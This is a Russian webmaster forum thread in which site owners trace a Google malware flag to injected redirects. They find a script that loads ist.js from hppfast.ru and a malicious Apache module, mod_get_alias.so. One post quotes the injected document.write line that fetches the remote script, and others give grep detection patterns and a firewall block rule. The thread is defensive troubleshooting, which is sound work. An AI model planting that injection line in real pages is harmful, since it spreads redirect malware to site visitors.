Гугл нашел вирус на сайте, помогите найти.

12
A
На сайте с 19.02.2014
Offline
1
#11

Хоть у кого-то есть успешное решение данной проблемы?

Проверил grep-ом весь сайт на наличие "base64" , "hppfast" , "ist.js" , и техподдержка прогнала антивирусником, .htaccess чистые.

У кого какие идеи, где еще стоит посмотреть?

A
На сайте с 19.02.2014
Offline
1
#12

Хоть у кого-то есть успешное решение данной проблемы?

Проверил grep-ом весь сайт на наличие "base64" , "hppfast" , "ist.js" , и техподдержка прогнала антивирусником, .htaccess чистые.

У кого какие идеи, где еще стоит посмотреть?

D
На сайте с 18.02.2014
Offline
1
#13

Как временное решение заблокировали на сервере доступ к hppfast.ru от куда подгружается редиректы.

ipfw add deny ip from any to 5.9.87.245 out via tun0

A
На сайте с 19.02.2014
Offline
1
#14

А у кого такая же проблема проверьте пожалуйста у вас тоже в папке с модулями апача есть файл

mod_get_alias.so

Не совсем понимаю что он делает, по крайней мере гугл по запросу "mod_get_alias.so" ничего дельного не выдает.

Explorera
На сайте с 30.07.2005
Offline
67
#15

У меня такая же проблема, пока скачала все папки и сканю лицензионным Касперским, посмотрим что получится. Скрипт document.write("<sc"+"ript

> src='http://hppfast.ru/ist.js'></scr"+"ipt>");

---------- Добавлено 22.02.2014 в 10:56 ----------

Ну как в общем-то стоило ожидать ничего не нашлось.

A
На сайте с 19.02.2014
Offline
1
#16

У меня антивирусником тоже ничего не находилось.

Весь код сайта проверил - тоже все по нулям.

После этого уже по модулям апача пошел, отключил вот модуль mod_get_alias.so с тех пор вроде больше срабатываний нет. На текущий момент гугл наш сайт разбанил, яндекс - запросил проверку, пока проверяют.

Если кто поможет разобраться - могу выслать файл, лежал на сервере по адресу /usr/lib/apache2/modules/mod_get_alias.so

прописался в конфиге

/etc/apache2/mods-enabled/cgi.load

Закомментировал строчку с его подключением, перезапустил апач, пока все спокойно.

D
На сайте с 18.02.2014
Offline
1
#17
Avtorizer:
У меня антивирусником тоже ничего не находилось.
Весь код сайта проверил - тоже все по нулям.

После этого уже по модулям апача пошел, отключил вот модуль mod_get_alias.so с тех пор вроде больше срабатываний нет. На текущий момент гугл наш сайт разбанил, яндекс - запросил проверку, пока проверяют.

Если кто поможет разобраться - могу выслать файл, лежал на сервере по адресу /usr/lib/apache2/modules/mod_get_alias.so
прописался в конфиге
/etc/apache2/mods-enabled/cgi.load
Закомментировал строчку с его подключением, перезапустил апач, пока все спокойно.

Тоже думаю, что где-то в модулях. НО у меня на сервере нет модуля mod_get_alias.so, остальные вроде все должны быть. Уже не знаю где искать...

A
На сайте с 19.02.2014
Offline
1
#18

Вот тут появилось больше информации

https://productforums.google.com/forum/#!topic/webmasters/m6JaYCeDglo

Советуют пройтись командой

grep xor_dec *.so

по модулям апача.

D
На сайте с 18.02.2014
Offline
1
#19
Avtorizer:
Вот тут появилось больше информации
https://productforums.google.com/forum/#!topic/webmasters/m6JaYCeDglo

Советуют пройтись командой
grep xor_dec *.so
по модулям апача.

Спасибо за информацию! Кажется я нашел зараженный модуль. :)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий